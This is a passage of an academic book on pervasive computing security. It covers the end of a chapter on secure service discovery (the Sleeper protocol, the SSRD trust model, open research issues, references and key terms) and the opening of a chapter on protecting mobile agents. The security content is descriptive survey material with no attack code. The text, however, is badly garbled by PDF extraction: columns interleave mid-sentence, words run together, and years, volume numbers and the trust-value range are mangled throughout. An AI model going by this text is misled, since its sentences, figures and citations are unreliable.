(Tripathi et al., 2004) and trust-based architecture Sleeper (Buford, Celebi, et al., 2006) is an en-
(TRAC) (Basu & Callaghan, 2005). ergy-preserving service discovery protocol which
CSRA (Tripathi et al., 2004) focuses on context- features dynamic proxy selection for advertise-
aware discovery of resources and how to access ment and discovery so that nodes can go to power
resources in a secure and unobtrusive manner. In standby while the proxy advertises on their behalf.
a pervasive computing environment the rules and The basic node states and transitions for Sleeper
limitations imposed by the user, system, and the are shown in Figure 2. An off-line or disconnected
collaborative activity scenario have to be combined node moves to an online state and broadcasts a
dynamically at runtime. CSRA uses a namespace join message that includes its advertisements and
related to each user and domain. These namespaces their popularity metrics. The current proxy caches
collect resources, services, and activities. The these advertisements. Any proxy-candidate node
bindingprotocoldefinestheassociation may alsoofa user
cache these advertisements. An online
to a specific resource in the space. Thenode binding
may broadcast a leave message prior to go-
changes based on the contextual information of ing off-line; if a leave message is not transmitted,
the user including the location, activity, and role. advertisements may be purged from the proxy and
A descriptor is associated with each namespace other online nodes’ cache by expiration. Transi-
that combines functional attributes collected from tions to/from standby state may also be indicated
resource descriptions in Web services description by broadcast messages.

An online node can be in one of four states et al., 2001). In this design, access control policies
(Figure 2). Every node initially goes online as a determine which credentials, services, and policies
non-proxy node. A proxy-capable node becomes should be disclosed during a negotiation. Policies
a proxy-candidate. There may be more than one and credentials are secured locally at each node
proxy-candidate at any time. When no proxy is but are disclosed during negotiation to the remote
detected, for example by absence of a service ad- party. Sleeper nodes establish mutual trust using
vertisement broadcast or at the exit of a proxy, the thetrustnegotiationmechanismdefinedinBufor
firstproxy-candidatetoissuetheproxy bootstrap
Park, and Perkins (2006). Assuming that each peer
becomes the proxy. A vacating proxy may transfer caches public keys for certificate issuers that a
its cache to the new proxy, or the new proxy may relevant to its peer trust policies, then peer trust
collect advertisements from online nodes through establishment can be performed without a central-
the bootstrap. Nodes which are in standby state ized authority. A service discovery mechanism
during the proxy change may be polled by the is privacy preserving, if a peer can discover the
new proxy after the standby node transitions to service description using the mechanism only if the
online. peersatisfiesthecriteriaC.Thusamechanismtha
Sleeper uses property-based peer trust to secure only distributes service descriptions to peers which
service discovery operations. In property-based or are members of group G with criteria C is privacy
credential-based trust (Hess et al., 2002; Seamons, preserving. Sleeper uses trust negotiation to create
Winslett, & Yu, 2001), each party has a set of certi- groups of peers that satisfy membership criteria C.
fiedattributese. ( g.credit
, cardnumbers, employee
Group management is provided by a group service
ID) that are exchanged to establish mutual trust. (GS) that is available at every peer. The GS caches
The typical components of a mechanism to provide private service descriptions for each group and
property-based trust include: allows only group members to retrieve them. The
GS publishes encrypted service descriptions that
• Trust negotiation protocol can only be decrypted by members of G. These
• Trust negotiation policies encrypted service descriptions are broadcasted to
• Credentials all connected peers, but can only be decrypted by
group members.
Amethodfortrustnegotiationhasbeen Thedefined
secure agent technology (Buford, Park, et
for client-server context (Hess et al., 2002; Seamons al., 2006) used in Sleeper for trust negotiation can
also be used for enabling trust in service composi-
tion (Buford, Kumar, & Perkins, 2006).
FigureSleeper
2. nodestatesandstatetransitions;
online nodes can be in one of four states (Buford ssrd
etal.,206)
With a view to ensure enhanced security through
a lightweight solution for resource discovery in
pervasive environment, simple and secure re-
source discovery (SSRD) has been proposed by
the researchers in Sharmin et al. (2006a). The
fundamental part of the solution is a trust–based,
service-oriented adaptive security mechanism built
on middleware adaptability for resource discovery,
knowledge usability, and self-healing (MARKS), a
middleware and framework developed for resource
constrained pervasive devices for pervasive appli-
cations (Sharmin et al., 2006b). The SSRD unit of

Figure 3. Sleeper groups in broadcast of advertise- Figure 4. Resource discovery model (Sharmin et
ments;symmetrickeysarebroadcastwith al.,206a)public
keyencryption(Buford,Celebi,etal.,206)
MARKS consists of trust management and security

management sub units and it provides a resource
discovery agent (Figure 4).
The trust management unit is responsible for
maintaining trust relationships with other devices.
It calculates trust values for the relationships be- the requester. This lessens both the computation
tween devices and also updates the trust values cost and the communication overhead.
depending on the behavior of the service provider or Trust models are designed to associate each
requester.Itmaintainsalistofservice- - specific
device with aaver
trust value based on past behavior
age trust values and communicates to the security with the requesting device. Also when we cal-
management unit whenever necessary. Trust values culate a trust value for an unknown device, we
arequantifiedintherangeofto 0. to
0. 1 represent
consider the PGP (Zimmermann, 1995) based
the degree of trustworthiness of a node. Complete trustmodel.PGPisbasedonmutualcertification
trust and complete distrust are represented by 1.0 of the validity of the keys. In case a new device
and 0.0 respectively. A new device with no prior joins the network or a device that never communi-
interaction record is assigned a value of 0.5, which cated with a service-providing device, the service
indicates a neutral condition. The dynamic property providing device generates a multicast message
trust evolves over time and may possess the asym- to all devices that it has interacted with and asks
metric transitive property depending on services. for their recommendation about this device. From
Each owner or manager of a device retains a table the recommendations the trust value is calculated
that indicates the security level (ranging from 1 for that service. The issue with dynamic update of
to 10) required by each of the available services trust values has been addressed more clearly with
or applications. The resource manager consults specific situations in the researchers’ enhan
“Service-trust” for all the neighboring nodes to adaptation of this model named SSRD+ (Sharmin,
decide whether the service could be provided. Ahmed, & Ahamed, 2006c).
For example, for services with security level < 5,
no trust calculation or secure communication is
needed. For services with higher security levels, futurE rEsEArcH
initially trust is calculated and then secure com-
munication is established between the provider and The open and dynamic nature of the pervasive com-
puting environment requires a security mechanism
0
that is unobtrusive to the user and makes it possible trust formation, evolution, and exploitation. In
to securely provide and discover the services avail- general, trust is formed by experience through
able for the user in a transparent manner. Some earlier interactions, verifiable properties of
of the open issues regarding challenges in secure party, recommendations from trusted entities, and
and private service discovery are highlighted in reputation in a community. The challenges faced
this section. during trust establishment are due to the absence
of a global trust framework, the large number of
Privacy autonomous and anonymous entities, the large
number of domains, and different trust require-
Although contextual information plays a pivotal ments for large number of application contexts.
role in dynamic pervasive environments, it may Recent context-aware trust models focus on
also expose private information. When granting dynamic trust values, which are updated over time
access to a service, a person’s context information and distance and incorporate behavioral models for
like location, time, and activity can be exposed. evolution of trust. Risk analysis maps each action
Further, policies and constraints are themselves to possible outcomes associated with a cost/ben-
subject to privacy protection. Private information efit.Decisionsconsiderthelikelihoodoftheris
management, such as the recursive constraint and cost. Unresolved issues in trust establishment
based security model in Hengartner and Steen- include detecting and prevent collusion, manag-
kiste (2006), is one approach to prevent direct ing the trade-off between privacy and property
information leakage. However, such mechanisms disclosure,andefficienttrustmechanismsinlar
are generally susceptible to attacks involving col- communities.
lusion and inference.
In a context- and location-sensitive medical Multi-Protocol Environments
application, researchers developed a system for
practitioners to easily share context in their work The combination of multi-homed mobile devices
tasks. Subsequently, questions of privacy led the and multiple service discovery protocols means that
designers to limit access to this information. As service access may cross not only administrative
another example, the Gaia project has shown a pri- boundaries but also different service discovery
vacy preserving hop by hop routing algorithm that domains with varying security properties. As an
carries information about the location of the user example, a mobile device may include protocol
but does not reveal the exact location or identity support for Bluetooth, SLP, and UPnP. Then the
of the user. Thus the privacy level and willing- device can easily discover services in different
ness of disclosure of personal information varies domains that it roams to, if these domains use dif-
depending on information type, collection method, ferent service discovery protocols. As a multi-home
time, and other factors. In some scenarios users device, it may simultaneously connect to domains
are reluctant to disclose identity information but do with different service discovery protocols.
not care about location information. The situation As a second example, a single user may have a
might be reversed in other cases. Formulation of setofpersonalmobiledevicesconfiguredinaPAN.
policies that are understood and can be managed These devices can use the PAN security mechanism
by users is an important goal. for security and privacy control, and identity-based
authentication for mutual trust. The PAN may sup-
trust portaspecificservicediscoveryprotocol.Oneor
more of the devices in the PAN may also connect to
As discussed earlier, a key element for secure outside networks with different service discovery
service discovery in ad hoc environments is the protocols and security mechanisms.
ability to establish a level of trust betweens peers. These types of scenarios indicate that future
The trust life cycle can be narrated in short as mobile devices may need to operate in multiple

Figure5.ConceptualdiagramofSSRDmodel(Sharminetal.,206b)
security contexts. In these cases there is the po- services that may be created from different service
tentialforconflictingaccesspolicies - andunantici
sources. Composition trust bindings (Buford, Ku-
patedinformationows fl betweendifferent mar, regions.
et al., 2006) are one approach for providing
Further, there are challenges in managing groups trust in both control and data paths in peer-to-peer
across domains and mapping service semantics service composition.
and identities between different domains.
trust in service composition conclusIon
A device in a pervasive computing environment The general availability of broadband-wireless-

may offer a service to other devices. The service enabled devices is a key catalyst in enabling many
may be aggregated from services offered by other powerful peer-to-peer usage patterns, which have
devices. By aggregating service facilities across been described as pervasive computing. However,
devices, a collection of limited-resource devices these usage scenarios will frequently involve de-
may be able to offer services that would otherwise vices which are outside a single secure administra-
not be available. However, devices which invoke tive boundary and may include ad hoc interactions
or participate in these services may be concerned where no prior trust relationship exists. Further,
about the integrity and trustworthiness of the vari- thereissignificantvariationinbasicauthentic
ous components that are combined to provide these authorization, and privacy mechanisms offered in
services. Existing service discovery mechanisms wireless networks. Consequently many existing
do not expose such nested or recursive relationships designs for service discovery have insufficient
when a service is offered or invoked. security, privacy, and trust support.
Conventional methods for assuring trustwor- Assuming that most wireless networks will
thiness of software components are typically in the future provide encrypted transmission,
used to convey trustworthiness to the end user or user/device authentication, and authorization
developer. They provide no explicit representation control in a given administrative domain, there
of trust between distributed components. Further, remain important security related questions for
these methods do not explicitly validate composite service discovery in cross-domain cases, in ad hoc

cases, and when the devices/users are not a priori WorkshoponIntelligentEnvironments(IE0502 ) 5

mutually authenticated. Consequently, we do not (pp. 223-229).
expect that improvements in the security of wire-
Bluetooth Special Interest Group. (2001a). Speci-
lessnetworks,whileimportant,willbesufficient
fication of the Bluetooth system—Core [Version
toaddressalltherequirementsidentifiedherefor
1.1].
secure service discovery.
Toward this end, after surveying a variety of Bluetooth Special Interest Group. (2001b). Speci-
approaches to secure service discovery today, fication of the Bluetooth system—Core [Version
we presented case studies of two recent service ]. . 1 . 1 SDPspecification(Vol.1partE).
discovery protocols, which include trust establish-
ment mechanisms to enable trust between a priori Brezillon, P., & Mostefaoui, G. (2004). Context-
untrusted devices and peers. We also provided a based security policies: A new modeling approach.
summary of future research directions. In Second IEEE International Conference on
Pervasive Computing and Communications-work-
shops (pp. 154-158).
rEfErEncEs Buford, J., Brown, A., & Kolberg, M. (2006). Meta
service discovery. In Proceedings of the Fourth
Almenarez, F., & Campo, C. (2003). SPDP: A secure IEEE Conference on Pervasive Computing and
service discovery protocol for ad-hoc networks. In Communications Workshops, Workshop on Mobile
Ninth Open European Summer School and IFIP Peer-to-peer (pp. 124-129).
Workshop on Next Generation Networks (EUNICE
2003) (pp. 213-218). Buford, J., Burg, B., Celebi, E., & Frankl, P. (2006).
Sleeper: A power-conserving service discovery
Almenarez, F., Marin, A., Campo, C., & Garcia, C. protocol. In Third Annual International Conference
(2004). PTM: A pervasive trust management model on Mobile and Ubiquitous Systems, Networking,
for dynamic open environments. In Pervasive and Services (Mobiquitous)026 (pp. 1-10).
Security, Privacy, and Trust (PSPT 2004).
Buford, J., Celebi, E., & Frankl, P. (2006). Property-
Almenarez, F., Marin, A., Dyaz, D., & Sanchez, based peer trust in the sleeper service discovery pro-
J. (2006). Developing a model for trust manage- tocol. In 30th Annual International Computer Soft-
ment in pervasive devices. In Fourth Annual IEEE wareandApplicationsConferenceCOMPSAC ( ’0, ) 6
International Conference on Pervasive Computing Workshop on Security, Privacy, and Trust for
andCommunicationsWorkshops(PERCOMW’0) 6 PervasiveApplicationsSPTPA ( (Vol.
) 026 2, pp.
(pp. 267-271). 209-214).
Balazinska, M., Balakrishnan, H., & Karger, D. Buford, J., Kumar, R., & Perkins, G. (2006). Com-
(2002). INS/Twine: A scalable peer-to-peer ar- position trust bindings in pervasive computing
chitecture for intentional resource discovery. In service composition. In Proceedings of the Fourth
International Conference on Pervasive Computing IEEE Conference on Pervasive Computing and
(pp. 195-210). Communications Workshops, Workshop on Per-
vasive Computing and Communication Security
Barbeau, M. (1999). Service discovery in a mobile
(PerSec) (pp. 261-266).
agent API using SLP. In Global Telecommunica-
tionsConferenceGLOBECOM ( ’9(Vol.
)9 1a, pp.Buford, J., Park, I., & Perkins, G. (2006). Social
391-395). certificates and trust negotiation. Third IEEE In
Consumer Communications and Networking
Basu, J., & Callaghan, V. (2005). Towards a trust
Conference (CCNC 026 ) (pp. 615-619).
basedapproachtosecurityanduserconfidencein
pervasive computing systems. In IEE International

Chen, Y., Jensen, C., Gray, E., Cahill, V., & Sei- Hess, A., Jacobson, J., Mills, H., Wamsley, R.,
gneur, J. (2003). A general risk assessment of Seamons, K., & Smith, B. (2002). Advanced cli-
security in pervasive computing (Tech. Rep. No. ent/server authentication in TLS. In Network and
TCD-CS-2003-45). The University of Dublin, Trin- Distributed System Security Symposium.
ity College, Department of Computer Science.
Joseph, A., Katz, R., Mao, Z., Ross, S., & Zhao, B.
Cotroneo, D., Graziano, A., & Russo, S. (2004). (2001). The Ninja architecture for robust Internet-
Security requirements in service oriented architec- scale systems and services. Computer Networks,
tures for ubiquitous computing. In Proceedings of 5 3 (4), 473-497.
the Second Workshop on Middleware for Pervasive
Kagal, L., Finin, T., & Joshi, A. (2001). Trust-based
and Ad-hoc Computing (pp. 172-177).
security in pervasive computing environments.
Czerwinski, S., Zhao, B., Hodes, T., Joseph, A., & IEEE Computer, 34(12), 154-157.
Katz, R. (1999). An architecture for a secure service
Kagal, L., Finin, T., Joshi, A., & Greenspan, S.
discovery service. In Fifth Annual International
(2006). Security and privacy challenges in open
Conference on Mobile Computing and Networks
and dynamic environments. IEEE Computer,
MobiCom
( ’9)9 (pp. 24-35).
93 (6), 89-91.
Ganu, S., Krishnakumar, A., & Krishnan, P. (2004).
Kagal, L., Korolev, V., Avancha, S., Joshi, A.,
Infrastructure-based location estimation in WLAN
Finin, T., & Yesha, Y. (2001). Highly adaptable
networks. In IEEE Wireless Communications and
infrastructure for service discovery and manage-
Networking Conference (WCNC) (pp. 465-470).
ment in ubiquitous computing (Tech. Rep. No. TR
Garlan, D., Siewiorek, D., Smailagic, A., & Steen- CS-01-06). Baltimore: University of Maryland,
kiste, P. (2002). Project Aura: Towards distrac- Department of Computer Science and Electrical
tion-free pervasive computing. IEEE Pervasive Engineering.
Computing, 1(2), 22-31.
Kagal, L., Korolev, V., Chen, H., Joshi, A., &
Goldberg, I., Gribble, S., Wagner, D., & Brewer, E. Finin, T. (2001). Project Centaurus: A framework
(1999). The Ninja jukebox. In Proceedings of the for intelligent services in a mobile environment. In
Second USENIX Symposium on Internet Technolo- International Workshop of Smart Appliances and
giesandSystems(USITS-)9 (pp. 37-46). Wearable Computing, International Conference of
Distributed Computing Systems (pp. 195-201).
Gribble, S., Welsh, M., Von Behren, R., Brewer,
E., Culler, D., Borisov, N., et al. (1999). Service Kindberg, T., & Fox, A. (2002). System software
location protocol version 2 (RFC 2608). Retrieved for ubiquitous computing. IEEE Pervasive Com-
from http://www.faqs.org/rfcs/rfc2608.html puting, 1(1), 70-81.
He, R., Niu, J., Yuan, M., & Hu, J. (2004). A novel Kopp, H., Lucke, U., & Tavangarian, D. (2005).
cloud-based trust model for pervasive comput- Security architecture for service-based mobile
ing. In The Fourth International Conference on environment. In Proceedings of the Third IEEE
Computer and Information Technology (CIT ’04) Conference on Pervasive Computing and Com-
(pp. 693-700). munications Workshops (pp. 199-203).
Hengartner, U., & Steenkiste, P. (2006). Avoiding Lee, C., & Helal, S. (2002). Protocols for service
privacy violations caused by context-sensitive discovery in dynamic and mobile networks. In-
services. In Proceedings of the Fourth Annual ternational Journal of Computer Research, 11(1),
IEEE International Conference on Pervasive 1-12.
Computer and Communications (PerCom )026
Matsumiya, K., Tamaru, S., Suzuki, G., Nakazawa,
(pp. 222-233).
J., Takashio, K., & Tokuda, H. (2004). Improving

security for ubiquitous campus applications. In Sharmin, M., Ahmed, S., & Ahamed, S. (2006a).
Symposium on Applications and the Internet- MARKS (middleware adaptability for resource
Workshops (SAINT 2004) (pp. 417-422). discovery, knowledge usability, and self healing)
in pervasive computing environments. In Third
Microsoft Corporation. (2000). Universal plug and
International Conference on Information Technol-
play device architecture, Version 1.0.
ogy: New Generations (pp. 306-313).
Miller, B., Nixon, T., Tai, C., & Wood, M. (2001).
Sharmin, M., Ahmed, S., & Ahamed, S. (2006b). An
Home networking with universal plug and play.
adaptive lightweight trust reliant secure resource
IEEE Communications Magazine,(12), 93 104-
discovery for pervasive computing environments.
109.
In Proceedings of the fourth annual IEEE inter-
Minami, K., & Kotz, D. (2005). Secure context- national conference on pervasive computer and
sensitive authorization. In Proceedings of the Third communications (PerCom)026 (pp. 258-263).
International Conference on Pervasive Computing
Sharmin, M., Ahmed, S., & Ahamed, S. (2006c).
and Communications Workshops (PerCom) 502
SSRD+: A privacy-aware trust and security model
(pp. 257-268).
for resource discovery in pervasive computing
Nidd, M. (2001). Service discovery in DEAPspace. environment. In 30th Annual International Com-
IEEE Personal Communications, 8(4), 39-45. puter Software and Applications Conference
COMPSAC
( )026 (pp. 67-70).
Pearson, S. (2005). How trusted computers can
enhance privacy preserving mobile applications. Smith, B., Seamons, K., & Jones, M. (2004). Re-
In Proceedings of the Sixth International IEEE sponding to policies at runtime in TrustBuilder. In
Symposium on a World of Wireless Mobile and Fifth International Workshop on Policies for Dis-
Multimedia Networks (WoWMoM’0(pp. )5 609- tributed Systems and Networks (POLICY 2004).
613).
Stajano, F. (2002). Security for ubiquitous com-
Robinson, P., Vogt, H., & Wagealla, W. (Eds.). puting. West Sussex, England: John Wiley and
(2005). Privacy, security and trust within the con- Sons.
text of pervasive computing. Heidelberg, Germany:
Stajano, F., & Anderson, R. (2002). The resur-
Springer-Verlag.
recting duckling: Security issues for ubiquitous
Saha, S., Chaudhuri, K., Sanghi, D., & Bhagwat, computing. IEEE Computer, 5 3 (4), 22-26.
P. (2003). Location determination of a mobile de-
Sun Microsystems. (2001). Jini™ technology core
vice using IEEE 802.11b access point signals. In
platformspecification,version.2 1
IEEE Wireless Communications and Networking
Conference (WCNC) (pp. 1987-1992). Thomas, R., & Sandhu, R. (2004). Models, pro-
tocols, and architectures for secure pervasive
Satyanarayanan, M. (1996). Fundamental chal-
computing: challenges and research directions. In
lenges in mobile computing. In Fifteenth ACM
Second IEEE International Conference on Perva-
Symposium on Principles of Distributed Comput-
sive Computing and Communications—Workshops
ing (pp. 1-7).
(PerCom 2004) (pp. 164-168).
Seamons, K., Winslett, M., & Yu, T. (2001). Limit-
Tripathi, A., Ahmed, T., Kulkarni, D., Kumar,
ing the disclosure of access control policies dur-
R., & Kashiramka, K. (2004). Context-based
ing automated trust negotiation. In Network and
secure resource access in pervasive computing
Distributed System Security Symposium.
environments. In Second IEEE Annual Confer-
Shankar, N., & Arbaugh, W. (2002). On trust for ence on Pervasive Computing and Communica-
ubiquitous computing. Workshop on security in tions—Workshops. (p. 159).
ubiquitous computing (UBICOMP 2002).

Undercoffer, J., Perich, F., Cedilnik, A., Kagal, Zhu, F., Mutka, M., & Ni, L. (2003). Splendor:
L., & Joshi, A. (2003). A secure infrastructure A secure, private, and location-aware service
for service discovery and access in pervasive discovery protocol supporting mobile services.
computing. Mobile Networks and Applications, In Proceedings of the First IEEE Conference on
8(2), 113-125. Pervasive Computing and Communications (Per-
Com 2003) (pp. 235-242).
Want, R., & Pering, T. (2005). System challenges
for ubiquitous and pervasive computing. In Twenty- Zhu, F., Mutka, M., & Ni, L. (2004). PrudentExpo-
seventh International Conference on Software sure: A private and user-centric service discovery
Engineering(ICSE) 502 (pp. 9-14). protocol. In Proceedings of the Second IEEE
Conference on Pervasive Computing and Com-
Weiser,The M.. ) 1 9 1 ( computerforthetwenty-first
munications (PerCom 2004) (pp. 329-340).
century. ScientificAmerican, (3),5 62 94-104.
Zhu, F., Mutka, M., & Ni, L. (2005). Expose or
Weiser, M. (1993). Some computer science prob-
not?Aprogressiveexposureapproachforservice
lems in ubiquitous computing. Communications
discovery in pervasive computing environments.
of the ACM, 63 (7), 75-84.
In Proceedings of the Third IEEE Conference
Winoto, W., Schwartz, E., Balakrishnan, H., & on Pervasive Computing and Communications
Lilley, J. (1999). The design and implementation of (PerCom) 502 (pp. 225-234).
an intentional naming system. In 17th ACM Sym-
Zhu, F., Mutka, M., & Ni, L. (2006). A private, se-
posium on Operating Systems Principles (SOSP
cure, and user-centric information exposure model
’9)9 (pp. 186-201).
for service discovery protocols. IEEE Transactions
Winslett, M. (2003). An introduction to automated on Mobile Computing, 5 (4), 418-429.
trust establishment. First international conference
Zimmermann, P. (1995). PGP source code and
on trust management.
internals. Cambridge, MA: MIT Press.
Wu, C., Fu, L., & Lian, F. (2004). WLAN loca-
tion determination in e-home via support vector
classification. IEEEIn
Conference on Networking,
kEy tErMs
Sensing & Control (pp. 1026-1031).
Context: Context is the location, time, and
Youssef, M., Agrawala, A., & Udaya, A. (2003). activity state of the user when performing a service-
WLAN location determination via clustering and related operation such as discovery, advertisement,
probability distributions. In Proceedings of the or invocation.
First Annual IEEE International Conference on
Federated Discovery: Federated discovery
Pervasive Computer and Communications (Per-
is a service discovery mechanism that incorpo-
Com 2003) (pp. 143-150).
rates two or more different service advertisement
Yu, T., & Winslett, M..)A302 ( unified scheme mechanisms.
for resource protection in automated trust negotia-
Meta Discovery: Meta discovery is the dis-
tion. In IEEE Symposium on Security and Privacy
covery of a service discovery mechanism by using
(pp. 110-122).
meta information about that mechanism (Buford,
Zhu, F., Mutka, M., & Ni, L., (2002). Classifica - Brown et al., 2006).
tion of service discovery in pervasive computing
Peer Trust: Peer trust is the degree to which
environments (Tech. Rep. No. MSU-CSE-02-24).
a peer device is willing to disclose information or
East Lansing: Michigan State University.
provide access to resources to another peer, and

which may be determined by experience through and security policies of the devices participating
earlier interactions, verifiable properties of eachprocess.
in the service location
party, recommendations from trusted entities, and
Service Composition: Service composition is
reputation in a community.
the ability to dynamically discover and combine
Pervasive Computing: Pervasive computing component services to form new services.
is the evolution of distributed computing in which
Service Discovery: Service discovery occurs
networked computing devices are integrated
when device resources and functions are packaged
throughout the personal and work environments
as services, in a networked environment, and a
in a connected way, also referred to as ubiquitous
devicefindsanotherdevicecapableofofferinga
computing.
specificserviceorresource.
Secure Service Discovery: Secure service
discovery is service discovery that enforces privacy

Chapter III
Zbigniew Kotulski
Polish Academy of Sciences, Warsaw, Poland
Aneta Zwierko
AbstrAct
The recent development in the mobile technology (mobile phones, middleware, wireless networks, etc.)
created a need for new methods of protecting the code transmitted through the network. The oldest
and the simplest mechanisms concentrate more on integrity of the code itself and on the detection of
unauthorized manipulation. The newer solutions not only secure the compiled program, but also the
data, that can be gathered during its “journey,” and even the execution state. Some other approaches
are based on prevention rather than detection. In this chapter we present a new idea of securing mobile
agents. The proposed method protects all components of an agent: the code, the data, and the execution
state. The proposal is based on a zero-knowledge proof system and a secure secret sharing scheme, two
powerful cryptographic primitives. Next, the chapter includes security analysis of the new method and
its comparison to other currently more widespread solutions. Finally, we propose a new direction of
securing mobile agents by straightening the methods of protecting integrity of the mobile code with risk
analysis and a reputation system that helps avoiding a high-risk behavior.
IntroductIon fortelecommunicationnetworksor - asartificiali

telligence (AI)-based intrusion detection systems.
A software agent is a program that can exercise Agents are commonly divided into two types:
autonomously toward a goal, and meet and interact • Stationary agents
with other agents (Jansen & Karygiannis, 1999). • Mobile agents
Agents can interact with each other to negotiate
contracts and services, participate in auctions, or The stationary agent resides at a single platform
barter. Multi-agent systems have sophisticated ap- (host), the mobile one can move among different
plications, for example, as management systems platforms (hosts) at different times.
The mobile agent systems offer new possibili- • Weakly mobile: Only the code is migrating;
ties for the e-commerce applications: creating new no execution state is sent along with an agent
types of electronic ventures from e-shops and e- program
auctions to virtual enterprises and e-marketplaces. • Strong mobile: A running program is mov-
Utilizing the agent system helps to automate many ing to another execution location (along with
e-commerce tasks. Beyond simple information its particular state)
gathering tasks, mobile agents can take over all
tasks of commercial transactions, namely, price The protection of the integrity of the mobile
negotiation, contract signing, and delivery of agent is the most crucial requirement for the agent
(electronic) goods and services. Such systems are system. The agent’s code and internal data autono-
developed for diverse business areas, for example, mously migrate between hosts and can be easily
contract negotiations, service brokering, stock changed during the transmission or at a malicious
trading, and many others (Corradi, Cremonini, host site. A malicious platform may make subtle
Montanari, & Stefanelli, 1999; Jansen & Karygi- changesintheexecutionow fl oftheagent’scode;
annis, 1999; Kulesza & Kotulski, 2003). Mobile thus, the changes in the computed results are dif-
agents can also be utilized in code-on-demand ficulttodetect.Theagentcannotitselfpreventt
applications (Wang, Guan, & Chan, 2002). Mobile but different countermeasures can be utilized in
agent systems have advantages even over grid order to detect any manipulation made by an un-
computing environments: authorized party. They can be integrated directly
into the agent system, or only into the design of an
• Require less network bandwidth agent to extend the capabilities of the underlying
• Increase asynchrony among clients and serv- agent system. However, the balance between the
ers security level and solution implementation’s cost,
• Dynamically update server interfaces as well as performance impact, has to be preserved.
• Introduce concurrency Sometimes, some restrictions of agent’s mobility
may be necessary.
The benefits from utilizing the mobileAccountability agents is also essential for the proper
in various business areas are great. However, this functioning of the agent system and establishing
technology brings some serious security risks; trust between the parties. Even an authenticated
one of the most important is the possibility of agent is still able to exhibit malicious behavior to the
tampering with an agent. In mobile agent systems platform if such a behavior cannot later be detected
the agent’s code and internal data autonomously and proved. Accountability is usually realized by
migrate between hosts and can be easily changed maintaining an audit log of security-relevant events.
during the transmission or at a malicious host site. Those logs must be protected from unauthorized
The agent cannot itself prevent this, but different accessandmodification.Alsothenon-repudiability
countermeasures can be utilized in order to detect of logs is a huge concern. An important factor of
any manipulation made by an unauthorized party. accountability is authentication. Agents must be
They can be integrated directly into the agent sys- able to authenticate to platforms and other agents
tem, or only into the design of an agent to extend and vice versa. An agent may require different
the capabilities of the underlying agent system. degrees of authentication depending on the level
Several degrees of agent’s mobility exist, cor- of sensitivity of the data.
responding to possibilities of relocating code and The accountability requirement needs also to
state information, including the values of instance be balanced with an agent’s need for privacy. The
variables, the program counter, execution stack, platform may be able to keep the agent’s identity
and so forth. The mobile agent technologies can secret from other agents and still maintain a form
be divided in to two groups: of revocable anonymity where it can determine
the agent’s identity if necessary and legal. The

security policies of agent platforms and their audit- method to provide such an environment is special
ing requirements must be carefully balanced with tamper-resistant hardware, but the cost of such a
agent’s privacy requirements. solution is usually very high.
Threats to security generally fall into three main The second group of methods provides the
classes: (1) disclosure of information, (2) denial of agents’ manager with tools to detect that the agent’s
service, and (3) corruption of information (Jansen, dataorcodehasbeenmodified,oranagentwitha
1999). Threats in agent system can be categorized mechanism that prevents a successful, unauthor-
with regard to agents and platform relations (e.g., ized manipulation. In this chapter we concentrate
agent attacking an agent, etc.). Another taxonomy on the “built-in” solutions because they enable
of attacks in agent system was proposed in Man an agent to stay mobile in the strong sense and,
and Wei (2001). The article describes two main moreover, provide the agent with mechanisms to
categories of attacks: purposeful and frivolous. detect or prevent tampering. Detection means that
The first kind is carefully planned and thedesigned
technique is aimed at discovering unauthorized
andcanbefurtherclassifiedbythenature ofattackofthecodeorthestateinformation
modification
(read or non-read) and number of attackers (solo or Prevention means that the technique is aimed at
collaborative). During the second kind of attacks, preventing changes of the code and the state infor-
the attacker may not know the effect of his/her mation in any way. To be effective, detection tech-
actions or gain an advantage. These attacks can niques are more likely than prevention techniques
be random or total. Another category of attacks is to depend on legal or other social framework. The
connected with traffic analysis (Kulesza, - Kotulbetween detection and prevention can
distinction
ski, & Kulesza, 2006) or called blocking attacks be sometimes arbitrary, since prevention often
(when a malicious platform refuses to migrate the involves detection (Jansen, 2000).
agent), as described by Shao and Zhou (2006). In
this chapter we will focus on the threats from an
agent’s perspective. bAckground
Among the mentioned threats, the most impor-
tant are connected with the agent platform since Many authors proposed methods for protecting
themostdifficulttoensureistheagent’s code/
integrity state
of the mobile code. The most interesting
integrity. There are two main concepts for protect- of them are presented in this section.
ing mobile agent’s integrity:
time limited black-box security and
• Providing trusted environment for agent’s obfuscated code
execution
• Detection or prevention of tampering These methods are based on a black-box approach.
The main idea of the black-box is to generate ex-
Thefirstgroupofmethodsismoreconcentrated ecutable code from a given agent’s specification
on the whole agent system than on an agent in that cannot be attacked by read (disclosure) or
particular. These seem to be easier to design and modificationattacks.Anagentisconsideredtobe
implement but, as presented in Oppliger (2000), black-box if at any time the agent code cannot be
mostly lead to some problems. The assumption that attacked in the previous sense, and if only its input
an agent works only with a group of trusted hosts and output can be observed by the attacker. Since
makes the agent less mobile than it was previously it is not possible to implement it today, the relax-
assumed. Also an agent may need different levels ation of this notion was introduced Hohl (1998): it
of trust (some information should be revealed to is not assumed that the black-box protection holds
host while in another situation it should be kept forever, but only for a certain known time. Accord-
secret). Sometimes, it is not clear in advance that ingtothisdefinition,anagenthasthetime-limite
the current host can be considered as trusted. A black-box property if for a certain known time it
0
cannot be attacked in the aforementioned sense. Encrypted functions

The time limited black-boxfulfillstwoblack-box
properties for this limited time: The encrypted functions (EF) method is one step
forward in implementing the perfect black-box
• Codeanddataoftheagentspecification - security.can
It has been proposed initially by Sander
not be read and Tschudin (1998). Since then other similar
• Codeanddataoftheagentspecification - solutionscan
were introduced (Alves-Foss, Harrison,
notbemodified & Lee, 2004; Burmester, Chrissikopoulos, &
Kotzanikolaou, 2000) and the method is believed
This scheme will not protect any data that is to be one of the canonical solutions for preserving
added later, although the currently existing vari- agent’s integrity (Jansen, 2000; Oppliger, 2000).
ables will be changeable. Thus, it cannot protect The goal of the EF, according to Jansen (2000),
the state of an agent, which can change between is to determine a method, which will enable the
different hosts or any data, which the agent gath- mobile code to safely compute cryptographic
ered. primitives, such as digital signature, even though
In order to achieve the black-box property, sev- the code is executed in non-trusted computing
eral conversion algorithms were proposed. They environments and operates autonomously without
are also called obfuscating or mess-up algorithms. interactions with the home platform. The approach
These algorithms generate a new agent out of an is to enable the agent platform to execute a program
original agent, which differs in code but produces assimilating an encrypted function without being
the same results. able to extract the original form. This approach
The code obfuscation methods make it more requires differentiation between a function and a
complicated to obtain the meaning from the code. program that implements the function.
To change a program code into a less easy “read- The EF system is described as follows by
able” form, they have to work in an automatic Oppliger (2000):
and parametric manner. The additional param-
eters should make possible that the same original A has an algorithm to compute function f. B has
